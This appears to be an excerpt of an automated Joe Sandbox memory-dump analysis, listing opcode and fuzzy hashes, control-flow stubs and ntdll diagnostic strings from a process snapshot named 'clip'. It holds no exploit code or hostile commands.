                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
                    • Instruction ID: d0eb613351f20e02da8d8e2b19c6a3a1f0fcc3df012b9146b8c12c87000b4d3d
                    • Opcode Fuzzy Hash: 0f47a6f9f7a4b96a5bfaa49f12541256607b177093adc0799d121a570871a7d6
                    • Instruction Fuzzy Hash: 6790023124140413F5117158450470710098BE1285F95C413A0425559D975ADA52A121
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
                    • Instruction ID: 06cce15b90b6ffedb4743f41592822b8a3c860790b8cbb79648b0a96a1e36015
                    • Opcode Fuzzy Hash: d054f683d7a2ac910676475ad67fc11b8d5801092a4a07b3b1bbc9cc2eae3b36
                    • Instruction Fuzzy Hash: 4590027124180403F5407558480460710058BE1346F55C013A2065556E8B2DDD516135
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
                    • Instruction ID: 96418df98a581ffc3cee659a0850daeca0263319e85e7eeac015290340895a02
                    • Opcode Fuzzy Hash: c3091d9b7853852b0e94e70ab8af9cb4e45089f0c85898068da26a6412e23573
                    • Instruction Fuzzy Hash: 0190023164140503F50171584404616100A8BE1285F95C023A1025556ECB29DA92A131
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
                    • Instruction ID: a7ce2791f5072b5cd1476b0016aa07a178e037f88c9b910e4ec52f56fbe405d5
                    • Opcode Fuzzy Hash: c4375c847d899e4d3ba0830c295e3253a1c85219c9df9ebfb76c626ff34f847f
                    • Instruction Fuzzy Hash: 6190027138140443F50071584414B061005CBF2345F55C017E1065555D871DDD526126
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
                    • Instruction ID: e9c6dd638d6c53178b32ce13802941adcd35ced40e9883255bb41b140558c27d
                    • Opcode Fuzzy Hash: cab31306b175e6fa485d1276c051e219e1eed192356d282519e88ba5d8fd0bc7
                    • Instruction Fuzzy Hash: 57900231251C0043F60075684C14B0710058BE1347F55C117A0155555CCB19D9615521
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
                    • Instruction ID: f94e0f1393c7a6f3158c2e12b20ac0e7a64da0db0b5f0051dafc69c749f849d7
                    • Opcode Fuzzy Hash: ccdb1fae37b99b1dd1d871ecbdefffa1be8ef56b76e2f172a83cc325792ac571
                    • Instruction Fuzzy Hash: B3900231641400436540716888449065005AFF2255755C123A0999551D875DD9655665
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
                    • Instruction ID: 74ec8df5a3dd1fcaf1282c729c2c4aa67fbe7bfa9046e37e96afcc757796e42d
                    • Opcode Fuzzy Hash: 17ee63bfa03f7ced375569f7e5ec1fca03055bab94a2ae45d05b1d01ff9b8d98
                    • Instruction Fuzzy Hash: 3890023128545103F550715C44046165005ABF1245F55C023A0815595D8759D9556221

                    Control-flow Graph

                    control_flow_graph 262 4402ad0-4402adc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
                    • Instruction ID: 45d4803ea27f9e9fc69f8cc98015b39b32156d72899a6fee84c138ce3def998f
                    • Opcode Fuzzy Hash: 544c3a42bbf32a86203e742701dfca7b9c98d814644aa045338d061842b8f966
                    • Instruction Fuzzy Hash: B2900235251400032505B558070450710468BE6395355C023F1016551CD725D9615121

                    Control-flow Graph

                    control_flow_graph 263 4402af0-4402afc LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
                    • Instruction ID: 6016b1be4c497fbb163163c27bdc76704d65f7bfd1b80c54a99ffdaa6ab6a2a0
                    • Opcode Fuzzy Hash: 51d45f832286f8e095c2f6e5376e30e3eab39f6f01067da955879c4206e53c71
                    • Instruction Fuzzy Hash: 42900235261400032545B558060450B14459BE7395395C017F1417591CC725D9655321

                    Control-flow Graph

                    control_flow_graph 264 4402b60-4402b6c LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
                    • Instruction ID: 033e49b9fc2072f357d6ee9acc9703349b02175f8689ee2f111514ea9acf2af0
                    • Opcode Fuzzy Hash: c02f8539718beaf7ece95b70b3de127e0b122cac66f10e6355646be5645ab6ea
                    • Instruction Fuzzy Hash: 9890027124240003650571584414616500A8BF1245B55C023E1015591DC729D9916125

                    Control-flow Graph

                    control_flow_graph 266 4402be0-4402bec LdrInitializeThunk
                    APIs
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
                    • Instruction ID: 26a5a4ad8bb5fe3508f06dd5eeeafcb38424b4ceed5083c1df024316c28df16e
                    • Opcode Fuzzy Hash: b19adb1f47b92d8eb90145379a0e2e3fd3f286f2afff22ca2f423717fc455ade
                    • Instruction Fuzzy Hash: 3390023124544843F54071584404A4610158BE1349F55C013A0065695D9729DE55B661

                    Control-flow Graph
                    control_flow_graph 267 4402bf0-4402bfc LdrInitializeThunk
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
                    • Instruction ID: 9cd5a66be87b63c7460cb47cf77a0023b76848916fb6150cde3652bcf8b258de
                    • Opcode Fuzzy Hash: 2d9f307fda93681d489ac2113d0f676b33f8e99212f6b0e084b4e983c5db3104
                    • Instruction Fuzzy Hash: 8490023124140803F5807158440464A10058BE2345F95C017A0026655DCB19DB5977A1

                    Control-flow Graph
                    control_flow_graph 265 4402ba0-4402bac LdrInitializeThunk
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
                    • Instruction ID: c3c1f6a1a8d89e79b37cfb27cdcf87b8bd5458722645503bf1217adbda9b17ab
                    • Opcode Fuzzy Hash: 6cc5a318911c25a761f34e8c01a813056a84725f507e33ce2a6392f9c412e00d
                    • Instruction Fuzzy Hash: DA90023164540803F5507158441474610058BE1345F55C013A0025655D8759DB5576A1

                    Control-flow Graph
                    control_flow_graph 258 4402c0a-4402c0f 259 4402c11-4402c18 258->259 260 4402c1f-4402c26 LdrInitializeThunk 258->260
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
                    • Instruction ID: c9737708b04c1c3a8971e176160091085744c0d39d089017a58a1dc70894942a
                    • Opcode Fuzzy Hash: 5e7a66fbb8771340e26aaad6abe52e59d1bd3d0f9bb281a43b7e24c962b409fb
                    • Instruction Fuzzy Hash: 6CB04C719455C586EE11A760460861779006BD1745F15C067D2021696A4778D591E175
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034491190.0000000004100000.00000040.00000800.00020000.00000000.sdmp, Offset: 04100000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4100000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 454349fe2e49458375ebc8e0eb49beec4e9819b54ccd1134fa378508492dde88
                    • Instruction ID: 9cc19a1ed7fa12b5e79d930076b5ce8abd660a30fecd9788fd53b9082373bd9c
                    • Opcode Fuzzy Hash: 454349fe2e49458375ebc8e0eb49beec4e9819b54ccd1134fa378508492dde88
                    • Instruction Fuzzy Hash: 7941F630618B094FD368AF68A0C1776B7E2FB89304F50852DD886D3292EBB0F8428785
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: ___swprintf_l
                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                    • API String ID: 48624451-2108815105
                    • Opcode ID: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
                    • Instruction ID: 551c53fbad9239f17329e4cc921e3cba2a2802547ea12119ba0d587d1af20b38
                    • Opcode Fuzzy Hash: 2ff9ed5b0d75a590afdcf7e1c53947cfd22601529c248278a2e1c229565ff54c
                    • Instruction Fuzzy Hash: 3951D6B6B00516BFDF21DF58988497EF7B8BB08205714C26BE495D76C1E274FE508BA0
                    Strings
                    • ExecuteOptions, xrefs: 044346A0
                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04434725
                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04434742
                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 044346FC
                    • Execute=1, xrefs: 04434713
                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04434655
                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 04434787
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                    • API String ID: 0-484625025
                    • Opcode ID: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
                    • Instruction ID: cd5eadc1723a65e3294ab13deed2b5d45523249607fec8804486b417599b3d30
                    • Opcode Fuzzy Hash: f2feccbf8aca79164aa525c5c3b52cc14017cd16e74391958ddd8a43107d2ea2
                    • Instruction Fuzzy Hash: 6051F6316402196BFF20ABA5EC85FBA77A8EF08705F0410AAE605A71D1EB71BE558F50
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-$0$0
                    • API String ID: 1302938615-699404926
                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction ID: 06ba6b7d771176aeff426dee150748270250d1c3170daa9029e9b62fe86b45f3
                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                    • Instruction Fuzzy Hash: 5581B230E052898ADF288EE8C8507BE7BB1EF85310F18C97BD851A73D1C634B8618B59
                    Strings
                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 044302BD
                    • RTL: Re-Waiting, xrefs: 0443031E
                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 044302E7
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                    • API String ID: 0-2474120054
                    • Opcode ID: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
                    • Instruction ID: bc633ea66c63bbe7667352390485bde01a10191530fbd58ac6e13b21f3132258
                    • Opcode Fuzzy Hash: fecf9231c32ea4ad6f4df6e0f101a97cbae8093df28615b26e4c70f195eac9bf
                    • Instruction Fuzzy Hash: ACE1BE30605741EFEB24CF29C884B2AB7E0BF88714F144A6EE5A58B6D1D7B4F845CB42
                    Strings
                    • RTL: Re-Waiting, xrefs: 04437BAC
                    • RTL: Resource at %p, xrefs: 04437B8E
                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04437B7F
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 0-871070163
                    • Opcode ID: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
                    • Instruction ID: 5541f9d9d4896c6d8731928ddd70358d3adc2c9aba2f170b1b4a5a4d81349760
                    • Opcode Fuzzy Hash: d6099cf421a7d0c96805398ac803dc6c856edda0950e81b7afd60bd2f585e296
                    • Instruction Fuzzy Hash: D041E2757007029FEB24DE25DC40B6BB7E5EF88715F100A2EEA969B681DB31F8058B91
                    APIs
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0443728C
                    Strings
                    • RTL: Re-Waiting, xrefs: 044372C1
                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04437294
                    • RTL: Resource at %p, xrefs: 044372A3
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                    • API String ID: 885266447-605551621
                    • Opcode ID: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
                    • Instruction ID: b9ed45197898adbf4676aaf0393a00b9569721506774775b41e0cd7257734fac
                    • Opcode Fuzzy Hash: 574da246ad382657a98e287f8dae469c0a4c8a79f4b4b212af3bb906dfaff9f4
                    • Instruction Fuzzy Hash: F54107B1700602AFDB20DE25CC41F66F7A5FB48B15F10461AF995A7781DB31F8168BD1
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID: __aulldvrm
                    • String ID: +$-
                    • API String ID: 1302938615-2137968064
                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction ID: 6eaf6812d2d91391ce66195cedcdae52d6a5a2f93638f5fbb47cd9a0bdf5249d
                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                    • Instruction Fuzzy Hash: 96918370E002159BEF24DF69C981ABFB7A5AF44760F14C53BE855A73C0E730B9618B62
                    Memory Dump Source
                    • Source File: 0000000E.00000002.3034659468.0000000004390000.00000040.00001000.00020000.00000000.sdmp, Offset: 04390000, based on PE: true
                    • Associated: 0000000E.00000002.3034659468.00000000044B9000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.00000000044BD000.00000040.00001000.00020000.00000000.sdmp
                    • Associated: 0000000E.00000002.3034659468.000000000452E000.00000040.00001000.00020000.00000000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_14_2_4390000_clip.jbxd
                    Similarity
                    • API ID:
                    • String ID: $$@
                    • API String ID: 0-1194432280
                    • Opcode ID: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
                    • Instruction ID: cc28ae36a183abd755d1b4024708f39bfe30c9287a12b1602c6bce750197ac0f
                    • Opcode Fuzzy Hash: df0b90c95047c80fee7eb60fcf5f3703b7a27241dafeba5264112f12d5636b88
                    • Instruction Fuzzy Hash: E0811CB2D002699BDB35CF54CD45BEAB7B8AF08714F0141DAE919B7280E7706E85CFA0